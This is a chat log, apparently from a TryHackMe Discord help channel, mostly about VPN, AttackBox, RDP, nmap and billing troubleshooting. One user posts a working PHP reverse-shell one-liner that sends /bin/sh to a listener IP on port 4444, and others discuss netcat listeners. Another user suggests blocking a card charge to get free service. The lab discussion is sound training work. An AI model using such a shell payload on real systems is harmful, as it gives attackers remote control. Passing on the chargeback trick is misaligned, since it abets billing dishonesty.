Okay I think I see the problem. So it's a little bit ambiguous, but you need to use your device to look up the file on Talos Intelligence using your device and not the machine itself, if I remember correclty

I need Email2.elm file to scan

if you look at the task above (Task 6), it'll show you how to use that website to lookup the artefacts. But again, this needs to be done via your personal device (or your AttackBox) and not the machine deployed in Task 5, because it doesn't have access to the internet 🙂

Mhhm I thought it was updated to include a way of downloading it to your machine but apparently not.

So you'll need to use something like netcat, or host a python webserver, or similar to download the file from that machine to either your AB or your device/VM connected to the THM VPN

I'm on Malware Introductory and I'm having trouble with task 6. I clicked on the start machine button and my screen split in two, with the tasks on the left and a desktop on the right. On the right I opened Remote Desktop Connection and inputted the computer and username info, but when I click on connect, it tells me that "The connection was denied because the user account is not authorized for remote login". Could someone help me out please?

ok bro, thanks

Gave +1 Rep to @zealous yoke (current: #8 - 866)

Is the support team up and solving tickets? Need to subscribe to premium, stuck for a week now!

for RDP you do that after you connect to THM VPN like the Task says (see screenshot), which means typically from your own VM
do not do RDP from target on the right pane in Split View, as you would try to RDP from the target to the target

The solution about openvpn connection error have been found. The error shows:2024-09-05 00:32:35 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set. 2024-09-05 00:32:35 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers. 2024-09-05 00:32:35 Note: '--allow-compression' is not set to 'no', disabling data channel offload. 2024-09-05 00:32:35 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO] 2024-09-05 00:32:35 library versions: OpenSSL 3.0.14 4 Jun 2024, LZO 2.10 2024-09-05 00:32:35 DCO version: N/A 2024-09-05 00:32:35 TCP/UDP: Preserving recently used remote address: [AF_INET]3.7.33.194:1194 2024-09-05 00:32:35 Socket Buffers: R=[212992->212992] S=[212992->212992] 2024-09-05 00:32:35 UDPv4 link local: (not bound) 2024-09-05 00:32:35 UDPv4 link remote: [AF_INET]3.7.33.194:1194 2024-09-05 00:32:35 TLS: Initial packet from [AF_INET]3.7.33.194:1194, sid=1efb21a9 9f34d986 2024-09-05 00:33:35 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 2024-09-05 00:33:35 TLS Error: TLS handshake failed. The reason is because of chinese gfw and the solution is adding socks-proxy in ovpn file, like this:

Hope someone who have the same error will find this solution by retrieving the chatting record

thank you for your feedback
this is valuable experience like you said for this community

Gave +1 Rep to @hot horizon (current: #2220 - 1)

Thx

Gave +1 Rep to @zealous yoke (current: #8 - 867)

#room-help

Yesterday I had a 78 streak and I made a ctf yesterday. 1 it didnt go towards my streak, 2 I was only able to use a streak freeze 1 time. I should have had 2. Is there support for this?

I dont know if im in the right channel. but i try to get a reverse shell over the vpn but my linux machine cant listen to the openvpn ip.

netcat: Cannot assign requested address```

You don't need to specify the IP.

yeah if i use none or 0.0.0.0 the reverse shell does not work.

it works on attackbox

Try using -nlvp

nope.

I dont get a responce. I use the same reverse shell i connected to attackbot

php -r '$sock=fsockopen("10.21.44.123",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

using debian linux

my hour of attackbox is over cant verify the command

ping results in a positive result.

Then something could be blocking on your VM.

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination```

openvpn setting perhaps?

oh wait.

using the right vm works. using the -nlvp works.

Hey everyone, I am having an issue downloading the vpn file for the CICD security network room. I tried the recommended procedure of leaving the room for 30 minutes, even resetting progress, then joining and regenerating a vpn file and then downloading but I always get "An unknown error has occurred". This is the 4th time I've tried it. Is anyone having the same issues?

Also, when I run the attack box, it is not connected to the CICD interface or network

when I run ifconfig, it is not connected it seems

I have just answered to your message in #ci-cd-and-build-security

Hey
I’m having trouble getting VPN packets for networks. This has been going on for days at this point. Is this being fixed?

Hello, I am having issues with Task machines on Windows. When I start the machine, after loading it says:

The TryHackMe remote server is not currently reachable. 
Please check your network and try again.

However, when I try that on Linux, it's working normally. Is this Windows-related issue ?
(AttackBox is working on Windows)

hello i was trying to connect to solve a lab but on my access page it shows im not connected but i'm already connected i can see my tun0 ip and can visit 10.10.10.10 . what can i do because i already redownloaded the config file and changed server then also it shows the same

See this: #site-support message

hello, I am unable to download the openvpn script for wreath network from the access page. I have subscribed but I haven't been able to download the file even after regenerating and reloading the page.

This is a known issue that staff are looking into - I suggest raising a support ticket and perhaps reading through the wreath channel messages starting here: #wreath-network message

Staff are aware of the issue, hopefully they can resolve it soon: #holo-network message

are there any advantages of connecting via the vpn rather than attackbox?

Your own VM will be set up to you and will have persistance

Attackbox will always revert to the state it was booted in

I see

Is there any way to revert it if you mess up a lab somehow? apologies if it's a silly question, I am still a noob

dont think I've had that issue yet though

how can i find the tool that was used to get windows password?

In what context? Was this a tool mentioned in a tryhackme room or what?

Revert your own VM? Sure, you could do that with snapshots. TryHackMe's all revert on their own as Scrubz said

thanks

Gave +1 Rep to @gleaming flume (current: #41 - 195)

Is anyone experiencing error 500 while submitting ansewers? This is happening to me in a room I'm developing. I saved the request in HAR in case the error does not go away soon for debugging purposes.

It must be an issue with my room, since for instance nothing strange happens in the new jwts room

Solved by deleting question and answer and reinserted it. Weird

im having issues witht the windows AD room, cant RDP into this machine from the attack box?? im not a noob i use rdp daily at work so what could the issue be? im literally running the admin server thats hosting the user im RDPing into

Ive also tried disconnecting and reconencting that didnt work either. Its Active Directory Basics task 4

Why does tryhackme wants to charge my card even tho i cancelled my sub 2 months agi

Or a month

call your bank and tell them to block the charge

did that with ACI learning and got almost 6 months for free bc the account was still active

@narrow hinge

They dont get the money but alr thx

Wow...

Hi, can you please reach out to support.

(Don't do what k1ngworm done)

Later

can you share screenshots?
here is what I am doing for that Task:

• launch remmina from the AttackBox
• use the credentials from Task 2
• be sure not to confuse the IP address of the AttackBox with the IP address of the target machine
  In my screenshot, the IP for the target (inside the double square) is different from the IP of the AttackBox (inside single square)

I have the coupon code from DEFCON and am trying to redeem it (had to let me current subscription expire before using it). It does not seem to work in the coupon field or in the ‘redeem voucher’ field in the profile -> subscription section?

You can't redeem a voucher with an active subscription, you need to let it expire.

Yes that’s what I meant. I let it expire and then tried

You may need to reach out to support then.

It's expired

Expired on 31st August

Ah that explains it,.thanks Blackout

is there any way to get premium for 2 weeks just to try it without paying or anth cause i still didnt get my pay check and running on low budget rn (just tryna solve more machines)

The server does giveaways sporadically, however there is no free trials.

is there a known issue with openvpn and mac.os with the platform ? (and maybe a fix )

Are you using it via brew?

how to see whats the room i joined but didnt complete?

you can my rooms.

https://tryhackme.com/r/rooms

Hi all. I have an issue with connection through openVPN. I can connect through the steps instructed, and I do get a green connection on the openVPN access page.
Yet, I get a red "Access Machine" on the room page, and can't access the room target machine (even though I am connected through openVPN, as I can access 10.10.10.10). Is there something I am missing?

Which target machine?

I am doing the Nmap tutorial, Complete Beginner
Network Exploitation Basics
Nmap

If I use a command on the attackbox, it works. If I do the same on my machine, it says I can't reach

Yeah, there is a reason for this, when you nmap it, what does the error say?

I get

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 11:30 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds

Command being : sudo nmap -sX -p1-999 10.10.XX.XXX // (my target machine local IP)

The Attackbox, with the exact same command, returns the correct result :

Starting Nmap 7.60 ( https://nmap.org ) at 2024-09-18 16:46 BST
Nmap scan report for ip-10-10-56-218.eu-west-1.compute.internal (10.10.56.218)
Host is up (0.00042s latency).
All 999 scanned ports on ip-10-10-56-218.eu-west-1.compute.internal (10.10.56.218) are open|filtered

can an admin/staff mention each badge and what room it need to be completed?

in the past 48h i spent exactly 39h hacking machines so id appreciate it to draw a path

Did you try the error message?

You know the host is up.

The badges are listed where you get then I'm sure.

hi

Hello everybody, i think there is a bug in the file inclusion room,After i open the attack box the room doesn't allow me to open to start the machine for the ip target address.

can anyone send me changing country link

i don't have any other opened machine

@west chasm , @marble breach

ik but all rooms isnt clear

You do

Resolved

What do you mean, by "try the error message"?

See the note attached to the message

Oh, I mean I did not since I am not worried about the command itself, but the fact that it works on the attackbox but not my machine

hi

anyone done the advent of cyber 2023 ??

i have done but i didnt get any certificate

It seems you are right nonethless, but I still can't explain the issue. Maybe version difference?

Nope.

It's Windows.

It blocks ICMP pings by default

Ah, I am running a VM, I didn't think that the host OS could be blocking the VM. It's a good lesson then! Thanks for the insight

The attackbox is on the same network, so ARP takes over, and allows the scans.

I'm really starting so excuse me if it's obvious, but let me try to clarify your answer to seee if I understand. You mean that actually the target is Windows, hence it blocks the incoming ping, but the attackbox is on the same network so ARP works.
I tried OS identification, there is no OS match but there seem to be some clues that it might indeed be Windows (Some ports running windows services for example).

And it might be trivial, but I thought that because of connection with the VPN, I would be considered on the same network of the target machine, hence having ARP too

Yeah, that's exactly it.

hi

is this possible to change our discord token on the website?

Great thanks for the answers and guidance. It would have been easier for me if I listened better to the advices of "-vv" and saw that ARP switch sooner! Another lessons learnt

Gave +1 Rep to @weary spindle (current: #1 - 2772)

Has it been exposed?

You learn something new either way! 😄

Happy hacking

yes

Where did you expose it to?

I'm trying to do threat intelligence tools scenario 1 and for this question: "From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..." there is no detection alias on Talos that starts with an H

I streamed my screen and accidentally showed the token while I was in the settings

Ok,.you'll need to reach out to support.

Hi! I'm not sure if this is the best place to ask, but I just finished the Complete Beginner Path. The certificate says I completed the path in around 16 hours but I'm sure it took me closer to 90 hours. Any idea why there's such a discrepancy? Thanks!

I must have overlooked launching remennia from the attack box, I don’t recall seeing anything about it tho

how do i switch between paths on thm? ive started a few paths, but i dont know how yo switch from one toa nother

I do not think they refer specifically to remmina: they just say that RDP is an option
remmina is one RDP client: I like it because it is GUI and available on THM AttackBox
other common RDP clients are xfreerdp or rdesktop
of course, you need an RDP client for linux if you launch it from THM AttackBox

It’s just not very straight forward for a walkthrough. I could have figured it out eventually but it doesn’t say anything about using an RDP application on the attack box. Very confusing. I’d recommend adding that bit of info to the room. Other than that it’s working fine!!😌👌

@upbeat quarry

Hello everyone. I'm trying to pay for the premium subscription on TryHackMe, but the payment won't go through. It says that the card issuer won't allow the payment. I've tried multiple cards, all of which normally work on other platforms. I even tried PayPal, but no luck. I was wondering if this could be related to the TryHackMe platform? Has anyone experienced something similar?

Can you contact support please.

Hey, I have downloaded Breaching-AD openvpn configuration file and then connected with it, but it still shows disconnected on access page. Also, am not able to ping the DC machine.

Access page is broken.

Ignore it

Did you follow steps in pinned #breaching-ad posts.

PING 10.10.232.45 (10.10.232.45) 56(84) bytes of data.
64 bytes from 10.10.232.45: icmp_seq=1 ttl=63 time=311 ms
64 bytes from 10.10.232.45: icmp_seq=2 ttl=63 time=312 ms
^C
--- 10.10.232.45 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 311.215/311.761/312.307/0.546 ms
daft@kali:~$ wget 10.10.232.45
--2024-09-19 10:01:07--  http://10.10.232.45/
Connecting to 10.10.232.45:80... connected.
HTTP request sent, awaiting response...```

im connected to vpn booted up a vm can ping it nmap shows port 80 open but the website does not load.

can you link the room? is port 80 a http port? what you trying to do with wget 10.10.232.45?

it loads very slow....

https://tryhackme.com/r/room/picklerick

check your VPN using the link coming below

@clear needle

i look at it. It was working for daysbefore today.

10.21.44.123daft@kali:~$```

strange i can now curl in cli (of my debian machine) but my kali docker (you cant install kali on a pi vm anymore) still does not load.

so loading web page OK on debian now, but not before (let's keep kali docker on the side for the moment)?

yeah. i reloaded openvpn with systemcl

the http://10.10.10.10/whoami works in browser from kali with no delay.

What does it load?

White screen?

sudo ip link set mtu 1200 dev tun0 if so

changed mtu from 1500 to 1200 no diffrence.

I get the title in my browser tab but blank page.

traceroute shows no stange paths. I can navigate other pages fine.

Then it's something on your end or give it more time

but 10.10.10.10 works fine how can it still be my side?

ssh to the ctf vm works.

only no port 80. I have no port 80 filters on my side for sure.

Because port 80 works on my side

yes but 10.10.10.10 works on my side. also. So if it was my side that would not work.

o dear disabled ipv6 on my home lab and its not comming back up :/

Not really, 10.10.10.10 is on a box that open 24/7.

You launched a target machine that is seperate from 10.10.10.10

then tell my how it can be on my side while its a diffrent ip on the tryhackme network.

I could access it.

im QA. do you know how many times a dev has told me: It works on my machine.

Have you tried rebooting the machine?

yup.

it worked and now it doesnt. the only thing that is diffrent from my machine to your machine is that i connect to the website over a docker instance.
but i can rearch the local network. perhaps there is some ip forward filter enabled the last few days

Hi, I know that this problem was there for a long time but I cannot download the VPN configuration for the Holo network
I tried to logoff-on, regenerate, waited few days, .... but everytime I want to download the VPN configuration for the Holo machine, I have a 0 line OpenVPN .ovpn file

What is even happening

had this 4 times in 15 mins already

Have you visited the page?

I did and it's mentioning that should be a rare occasion, that's what confused me. Anyway seems to be fine. I thought that's something that would only happen to free members

Do we keep access to subscriber only rooms if we let a subscription lapse ?

or do they get locked out ?

I cannot even download the VPN file: the download button spins for 1 minutes (same for the regenerate button)
the problem with Holo network has been acknowledged here:
#holo-network message
however, my impression when you read the messages of that channel, is that things work for some users
also I think that, if you want a format feedback from THM, you should open a support ticket: document as much as possible (screenshots, etc.) including the subnet or subnets you have been assigned when trying

why do we even need to do such a ticket

they can just fix the problem for everyone! 😂

of course you do not need, but realize that THM Discord is mainly a community of THM users
next to that, THM organizes support (email, chatbot) and I believe that is the interface to talk to THM
between Discord and support, you do see THM staff interacting in Discord, but I do not think you can be sure they will read and react to your messages

hello, could you share the screenshot for the second scan

it's still taking very long as a non-root user

see screenshot: there are 3 windows:

• top window: running as root, taking for ever (and actually still running as I type about 10 minutes after starting)
• middle window: running as ubuntu (i. e. non-root: that user exists when you start THM AttackBox): same command as top window, with results in 2.55 seconds
• bottom window: running as root, but with the -sT flag, which is the default one when you run nmap as non-root; so it is equivalnet to the middle window, and this is evidenced by the fact that it took 2.39 seconds there too

how to upload images to this server

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:16 +08

it says this then doesn't do anything

you should verify with Discord so that you can share screenshots: see link coming next
also, please do not mulitpost: it is a duplication of efforts
about nmap not doing anything, you can ask nmap for progress by pressing the space bar anytime (and actually nearly any key)
you can also add verbosity on the fly by pressing v or reduce verbosity by pressing V
have you started nmap as non-root, or as root with -sT?

@untold agate

Known Issue and being fixed on 🙂

thanks for the update! It already seems to be much better on my side

Gave +1 Rep to @wind wedge (current: #52 - 154)

Seeing this error when launching the Attack Box. Can't be closed. Relaunching isn't fixing it, been like this for 2-3 days. Any ideas?

thmVNC encountered an error:

Loading chunk 5 failed.
(undefined: undefined)
@webkit-masked-url://hidden/:1:4672
@webkit-masked-url://hidden/:1:2992
reduce@[native code]
@webkit-masked-url://hidden/:1:2976
@webkit-masked-url://hidden/:1:5604
t@webkit-masked-url://hidden/:1:5637
@webkit-masked-url://hidden/:1:5722
i@webkit-masked-url://hidden/:1:5755
@webkit-masked-url://hidden/:1:6255
@webkit-masked-url://hidden/:1:6315
dispatchEvent@[native code]
@webkit-masked-url://hidden/:1:5931
c@webkit-masked-url://hidden/:1:5935
@webkit-masked-url://hidden/:1:6319
@webkit-masked-url://hidden/:1:6662
global code@webkit-masked-url://hidden/:1:6674

@zealous yoke any ideas?

Dear tryhackme, now I am using montly subscription and it's going to expire soon. I would like to acquire how I can change from normal to student discount as an college student. Thank you

Trying to subscribe to the monthly plan

What is this error?

Change your email to your edu one.

Hi can someone help me with what I am doing wrong with downloading the OpenVPN config for the hololive network? It always loads for like 2 minutes, then states „An unknown error has occurred“. Regenerating the config and leaving / joining Holo again does not resolve the issue for me

Did someone have similar issues?

I have the same problem
Check this message earlier today: #site-support message

I should have read more of the messages from today 😅 Thank you for the info, at least I am not alone with this problem 😉

Gave +1 Rep to @upbeat quarry (current: #47 - 169)

someone in my workspace has 32 points accumulated this month, but nobody has purchased access to the workspace assignments. How is that possible?

Doing rooms currently that are under 1 month grant points on the workspace. This has been raised so maybe a rework will be done in the future

like under 1 month since they have been released? Apologies if im misunderstanding

Ahh sorry should have been more specific, Yep that’s correct. If a challenge is over a month it wil score 25% of the points and for walkthroughs over a month don’t count

For challenges and walkthroughs under a month score full points

interesting thanks

hello

can we install the attack machine ubuntu

that tryhackme have

guys i have bought a voucher on tryhackme, but the code didnt sent to my email, where i can see it ?

Dear Staff, I am using openvpn to solve the room with wsl kali. However, I found that openvpn is not connected in the company firewall. (Mobile hotspot is not connected well) To solve this, I will ask the company firewall person to modify the policy, which rule set should I ask for? Tryhackme site access is good, but when I open the openvpn file, there is an ip in the remote variable, should I ask them to allow it?

Non-root with -sT

Does that not work?

Do drop an email to THM Support.

@naive dust

Install? Meaning download a copy of the Attackbox image and install / upload it as a VM in your machine?

Connected to company firewall? Are you subscribed to THM via a business account?

I'm studying with my personal account, and I'm going to use it for personal study time at work. I think this is okay because it was approved in advance, but is there a problem? I'm a personal subscriber

Hmm.. it would depend on your company policy. Without going into much detail, VPNs, especially those that were not approved for official use, may be used to circumvent or bypass certain controls your company has put in place.

My question is, I'm going to request a firewall rule set permit policy, and I wonder if I can register for the tryhackme.com domain. I wonder if there is a separate IP. Is this a different issue?

It will still work, but it may not be as effective when running it as root. There are certain privileges required by nmap to do additional scanning tests such as opening sockets, etc.

Have you tried asking if it would be possible to simply setup a wireless access point, separate from your corporate one, that you can use?

it still takes >10 minutes

guys could someone help me with this problem?
im unable to login using ssh. It keeps saying permission denied

There are a couple of factors that could affect the speed by which nmap scans get completed such as internet speed, the distance the packets travel from your location to the destination, the resources the target machine has, etc.).

You are connecting to the Attackbox IP. Have you clicked on the green Start Machine button anywhere on the task?

yes i have

it worked yesterday but today when I tried to login it wont work

If you did, then you are using the wrong IP today.

oh nvm

i got it

thank you for the help @ivory spruce

Gave +1 Rep to @ivory spruce (current: #11 - 692)

No it’s not available for download

it would be interesting to add to that picture the latency you have by showing the output of ping <ip>
(cfr. the response you got to this message from @ivory spruce )
also, doing -T5 over the VPN may be more confusing than helpful
so far, the screenshots I shared showed nmap done from the AttackBox and the better speed with -sT
so, I thought I would compare AttackBox with Kali through the VPN (see screenshot):

• on the right: the Attackbox with results similar to before
• on the left: Kali through the VPN
  • I have a latency of about 30 ms
  • nmap for the whole range of ports take about the same time whether root or non-root
    So, it turns out that, for me with Kali through the VPN, I have a decent response time for both nmap commands, and somehow a better experience than with the AttackBox
    I cannot explain that difference
    The take away from this for me at this stage: if one nmap command takes too much time, I would try the other one

the destination is where the tryhackme server is located?

that's interesting

In this case, yes.

my server is in a different region, so i guess it makes sense

hello can someone help i get

nslookup tryhackme.com 10.200.25.101
;; connection timed out; no servers could be reached

on https://tryhackme.com/r/room/breachingad

Check the pinned posts in #breaching-ad

wait, why is using -T5 confusing?

-T5 can miss ports

i'm trying to change server but it's always saying not connected on the access page

even though i regenerated the configuration file

Check pinned posts

oh i did have multiple tuns open

is there a way to close all of them

i don't know which configuration file it's from

sudo killall openvpn
that comes from a troubleshooting guide coming in the link below

@untold agate

oh ok

can free users keep extending the target machine infinitely?

6 hours is the max

For everyone

Hello everyone! I'm an educator based in the US. I just purchased eight seats and assigned students and myself to them, but I still can't progress in the path I was having a look at (intro to pentesting) and in the dashboard it says that there are 7/7 users left to join. I haven't received an email to join yet and have checked my spam folder.

daily right

Yeah

Can you please reach out to support via email.

i changed my region to a nearer one but the scan still takes very long

my internet has a latency of 5 ms

what is your latency to 10.10.10.10 over THM VPN?
are you on wifi? can you use cable?

how do i find that

ping -c 10 10.10.10.10: this will send 10 ICMP echo requests to 10.10.10.10 IP address once you have connected to THM VPN
the output will give a time in second ms: that is the latency

it's approximately 190 ms 💀

190 ms is not great, but there is worse
I have 30 ms
that latency would be the criteria to evaluate the quality of the different VPN servers you can try: if the one furthest to you has a better latency, go for that one
finally: are you on cable or any kind of wireless?

i'm on wireless

is there any way to compare the latency of the different servers without actually going on them

Will do. I have to admit though, customer service has been less than stellar to this point.

Accounts and billing is done via e-mail, the Discord server has admin who are thm staff, but all the mods etc are all voluntary.